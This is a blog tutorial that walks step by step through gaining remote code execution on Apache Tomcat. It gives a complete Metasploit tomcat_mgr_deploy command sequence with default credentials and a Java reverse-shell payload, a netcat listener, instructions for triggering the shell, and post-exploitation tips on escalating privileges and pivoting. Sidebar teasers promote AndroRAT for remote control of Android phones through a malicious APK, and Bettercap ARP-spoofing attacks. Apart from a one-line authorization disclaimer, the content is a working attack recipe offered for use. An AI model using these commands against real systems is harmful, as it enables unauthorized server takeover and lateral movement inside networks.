Apache Tomcat Upload Exploitation (Step-by-Step Guide)

-

 

Apache Tomcat Upload Exploitation (Step-by-Step Guide)

🎥 Watch the demonstration here: https://youtu.be/P8nlsRdKzT8

If you’re diving into web exploitation or pentesting Apache Tomcat servers, upload-based exploitation is one of the key techniques to understand. This method targets weak configurations where Tomcat allows file uploads (such as WAR files) that can be executed on the server—leading to Remote Code Execution (RCE).

In this blog post, we’ll walk through Apache Tomcat Upload Exploitation with clear steps and explanations. Whether you're learning ethical hacking or creating educational content, this walkthrough is a practical hands-on example.

🔧 Requirements

  • Kali Linux or any attacker machine

  • Apache Tomcat server (target)

  • Valid Tomcat credentials (default or stolen)

  • Metasploit (optional, but useful)

Step 1: Access the Tomcat Manager Panel

Tomcat’s web interface usually runs on:
http://<target-ip>:8180/manager/html

If credentials are known (like tomcat:tomcat, admin:admin, or brute-forced), logging into the Manager App section allows you to deploy a new WAR file. This is our entry point to gaining control. Before you doing those at first follow the steps from you Kali linux terminal with root permission. 

            msfconsole
            use exploit/multi/http/tomcat_mgr_deploy
            set RHOSTS <target-ip>
            set RPORT 8180
            set TARGETURI /manager
            set HTTPUSERNAME tomcat
            set HTTPPASSWORD tomcat
            set PAYLOAD java/shell_reverse_tcp
            set LHOST <your-ip>
            set LPORT 4444
            exploit/run

Step 3: Upload the WAR File via Tomcat Manager

Log into the Tomcat Manager and scroll to the Deploy section.

  • Upload the shell.war file.

  • Click Deploy.

I have Demonstrated how to crate war file from kali linux terminal in my video so if need help can watch the video - How to create War File

Tomcat extracts the WAR file and creates a new web application context, e.g., http://<target-ip>:8180/shell/.

Step 4: Start a Netcat Listener

On your Kali machine, start a listener:

        nc -lvnp 4444

This opens a port to catch the reverse shell once the payload is executed. Keep this running before triggering the shell.

Step 5: Trigger the Payload

Visit the deployed app’s URL:

        http://<target-ip>:8180/shell/

Once the JSP shell runs, it connects back to your listener. If successful, you now have a reverse shell on the server. When you will type the url from your browser the shell file will be executed to the remote server so check the link carefully, The IP and port number that your tying is correct or not. 

Step 6: Post-Exploitation

Once in, you can:

  • Enumerate the server

  • Escalate privileges

  • Pivot further inside the network

But remember, this technique is only to be used in authorized environments like labs or client-approved engagements. All those Techniques has briefly demonstrated in my video so if you don't understand with this topic can watch my videohttps://youtu.be/P8nlsRdKzT8  

If you don't understand anything with this content please let me know and if you get this helpful subscribe my youtube channel. 



Comments

Post a Comment

Popular posts from this blog

🔓 Complete Guide to AndroRAT: Hack Android Devices Over LAN & Internet Using Python - Educational Purposes Only

-
Image
 ⚠️ Disclaimer : This tutorial is intended for educational and ethical hacking purposes only. Unauthorized access to devices is illegal. Use this tool only in a controlled environment or with explicit permission . 📌 What is AndroRAT? AndroRAT (Android Remote Administration Tool) is a powerful open-source tool that allows you to remotely access and control Android devices. It is commonly used by cybersecurity learners and ethical hackers to understand how remote access works on Android. AndroRAT is written in Python and works by creating a malicious APK file that, when installed on a target device, gives the attacker full control via a remote shell. 🎯 Features of AndroRAT           AndroRAT offers an impressive range of features once connected to a victim's phone: Access call logs, SMS, contacts Capture camera photos or record audio/video Track GPS location in real-time Send fake messages or toasts Even reboot the phone remotel...
Read more

How to Use Bettercap for ARP Spoofing & MITM Attacks and its Prevention: Being Expert of MITM

-
Image
  ARP Spoofing and MITM Attacks with Bettercap In the world of cybersecurity, one of the most common attack techniques used by hackers is the Man-in-the-Middle (MITM) attack, often combined with ARP (Address Resolution Protocol) spoofing. This article will explain the concepts of ARP spoofing, MITM attacks, why attackers use these methods, and how to use the Bettercap tool to perform these attacks effectively. I have made a youtube Video - Network hacking for this penetration attack. This is only for education purpose so please don't use this for any harmful activities. The author will not be liable for any bad activities.  What is ARP Spoofing? ARP spoofing, also known as ARP poisoning, is a method of attacking a local area network (LAN) by sending fake ARP messages to associate an attacker’s MAC address with the IP address of another device (such as a router or another user’s machine). This trick allows the attacker to intercept or alter traffic between devices on the...
Read more

How to protect ARP spoofing & DNS Spoofing in a Mikrotik Network.

-
Image
  MikroTik Network Security: How to Prevent ARP Spoofing and DNS Attacks   Understanding ARP Spoofing and DNS Spoofing        ·         ARP Spoofing: Attackers send fake ARP messages on the network to associate their MAC address               with an IP address (e.g., your gateway). This allows them to intercept, modify, or block network traffic (man-in-the-middle attacks). ·          DNS Spoofing: Attackers alter DNS queries to redirect users to malicious websites by sending false DNS responses or poisoning the DNS cache.  Here we divide the topic for best understanding and point out those Attacks prevention techniques step by step I have made a description youtube video for this if you like can watch this too. Click link   1. Steps to Protect Against ARP Spoofing        Enable ARP Filtering and ...
Read more